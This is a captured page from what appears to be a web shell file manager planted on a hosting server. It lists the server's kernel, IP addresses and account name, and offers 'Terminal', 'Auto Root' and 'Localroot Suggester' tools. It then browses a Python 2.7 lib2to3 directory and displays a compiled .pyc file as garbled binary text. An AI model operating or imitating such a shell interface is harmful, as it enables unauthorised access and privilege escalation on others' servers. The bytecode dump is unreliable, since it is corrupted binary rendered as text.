Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
python27 /
lib64 /
python2.7 /
lib2to3 /
Delete
Unzip
Name
Size
Permission
Date
Action
fixes
[ DIR ]
drwxr-xr-x
2025-08-15 19:25
pgen2
[ DIR ]
drwxr-xr-x
2025-08-15 19:25
Grammar.txt
6.93
KB
-rw-r--r--
2025-01-08 10:54
Grammar2.7.18.final.0.pickle
39.54
KB
-rw-r--r--
2025-01-08 10:54
PatternGrammar.txt
793
B
-rw-r--r--
2025-01-08 10:54
PatternGrammar2.7.18.final.0.pickle
2.73
KB
-rw-r--r--
2025-01-08 10:54
__init__.py
7
B
-rw-r--r--
2025-01-08 10:54
__init__.pyc
140
B
-rw-r--r--
2025-01-08 10:54
__init__.pyo
140
B
-rw-r--r--
2025-01-08 10:54
__main__.py
67
B
-rw-r--r--
2025-01-08 10:54
__main__.pyc
255
B
-rw-r--r--
2025-01-08 10:54
__main__.pyo
255
B
-rw-r--r--
2025-01-08 10:54
btm_matcher.py
6.67
KB
-rw-r--r--
2025-01-08 10:54
btm_matcher.pyc
5.83
KB
-rw-r--r--
2025-01-08 10:54
btm_matcher.pyo
5.83
KB
-rw-r--r--
2025-01-08 10:54
btm_utils.py
9.78
KB
-rw-r--r--
2025-01-08 10:54
btm_utils.pyc
7.55
KB
-rw-r--r--
2025-01-08 10:54
btm_utils.pyo
7.55
KB
-rw-r--r--
2025-01-08 10:54
fixer_base.py
6.62
KB
-rw-r--r--
2025-01-08 10:54
fixer_base.pyc
7.22
KB
-rw-r--r--
2025-01-08 10:54
fixer_base.pyo
7.22
KB
-rw-r--r--
2025-01-08 10:54
fixer_util.py
14.25
KB
-rw-r--r--
2025-01-08 10:54
fixer_util.pyc
14.77
KB
-rw-r--r--
2025-01-08 10:54
fixer_util.pyo
14.77
KB
-rw-r--r--
2025-01-08 10:54
main.py
11.33
KB
-rw-r--r--
2025-01-08 10:54
main.pyc
9.73
KB
-rw-r--r--
2025-01-08 10:54
main.pyo
9.69
KB
-rw-r--r--
2025-01-08 10:54
patcomp.py
6.9
KB
-rw-r--r--
2025-01-08 10:54
patcomp.pyc
6.6
KB
-rw-r--r--
2025-01-08 10:54
patcomp.pyo
6.29
KB
-rw-r--r--
2025-01-08 10:54
pygram.py
1.13
KB
-rw-r--r--
2025-01-08 10:54
pygram.pyc
1.45
KB
-rw-r--r--
2025-01-08 10:54
pygram.pyo
1.45
KB
-rw-r--r--
2025-01-08 10:54
pytree.py
28.36
KB
-rw-r--r--
2025-01-08 10:54
pytree.pyc
30.56
KB
-rw-r--r--
2025-01-08 10:54
pytree.pyo
29.7
KB
-rw-r--r--
2025-01-08 10:54
refactor.py
27.37
KB
-rw-r--r--
2025-01-08 10:54
refactor.pyc
23.87
KB
-rw-r--r--
2025-01-08 10:54
refactor.pyo
23.83
KB
-rw-r--r--
2025-01-08 10:54
Save
Rename
� 3Y~gc @ s� d Z d Z d d l Z d d l Z d d l m Z d d l m Z d d l m Z d e f d � � YZ d e f d � � YZ i a d � Z d S( s� A bottom-up tree matching algorithm implementation meant to speed up 2to3's matching process. After the tree patterns are reduced to their rarest linear path, a linear Aho-Corasick automaton is created. The linear automaton traverses the linear paths from the leaves to the root of the AST and returns a set of nodes for further matching. This reduces significantly the number of candidate nodes.s+ George Boutsioukis <gboutsioukis@gmail.com>i����N( t defaultdicti ( t pytree( t reduce_treet BMNodec B s# e Z d Z e j � Z d � Z RS( s? Class for a node of the Aho-Corasick automaton used in matchingc C s1 i | _ g | _ t t j � | _ d | _ d S( Nt ( t transition_tablet fixerst nextR t countt idt content( t self( ( s8 /opt/alt/python27/lib64/python2.7/lib2to3/btm_matcher.pyt __init__ s ( t __name__t __module__t __doc__t itertoolsR R ( ( ( s8 /opt/alt/python27/lib64/python2.7/lib2to3/btm_matcher.pyR s t BottomMatcherc B s; e Z d Z d � Z d � Z d � Z d � Z d � Z RS( sg The main matcher class. After instantiating the patterns should be added using the add_fixer methodc C sF t � | _ t � | _ | j g | _ g | _ t j d � | _ d S( Nt RefactoringTool( t sett matchR t roott nodesR t loggingt getLoggert logger( R ( ( s8 /opt/alt/python27/lib64/python2.7/lib2to3/btm_matcher.pyR s c C sh | j j | � t | j � } | j � } | j | d | j �} x | D] } | j j | � qJ Wd S( s� Reduces a fixer's pattern tree to a linear path and adds it to the matcher(a common Aho-Corasick automaton). The fixer is appended on the matching states and called when they are reachedt startN( R t appendR t pattern_treet get_linear_subpatternt addR ( R t fixert treet lineart match_nodest match_node( ( s8 /opt/alt/python27/lib64/python2.7/lib2to3/btm_matcher.pyt add_fixer% s c C s� | s | g St | d t � r� g } xU | d D]I } | j | d | �} x+ | D]# } | j | j | d | � � qS Wq1 W| S| d | j k r� t � } | | j | d <n | j | d } | d r� | j | d d | �} n | g } | Sd S( s5 Recursively adds a linear pattern to the AC automatoni R i N( t isinstancet tupleR t extendR R ( R t patternR R"